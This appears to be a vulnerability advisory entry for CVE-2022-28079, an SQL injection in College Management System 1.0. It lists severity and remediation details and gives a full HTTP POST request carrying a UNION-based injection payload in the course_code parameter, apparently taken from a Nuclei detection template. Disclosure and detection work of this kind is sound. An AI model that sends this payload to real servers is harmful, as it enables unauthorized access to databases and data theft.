| Title | College Management System 1.0 - SQL Injection |
|---|---|
| Author | ritikchaddha |
| Severity | High |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential manipulation of the database. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 8.8 |
| EPSS Score | 0.83475 |
| CVE ID | CVE-2022-28079 |
| CWE ID | CWE-89 |
| Tags | cve cve2022 sqli cms collegemanagement college_management_system_project vkev vuln |
College Management System 1.0 contains a SQL injection vulnerability via the course code parameter.
POST /admin/asign-single-student-subjects.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Connection: close
Content-Length: 100
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
submit=Press&roll_no=3&course_code=sd' UNION ALL SELECT CONCAT(md5(1330),12,21),NULL,NULL,NULL,NULL#
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-28079.yaml
🦈 Packet Capture: ⬇️ Download cve-2022-28079.pcap
N/AN/A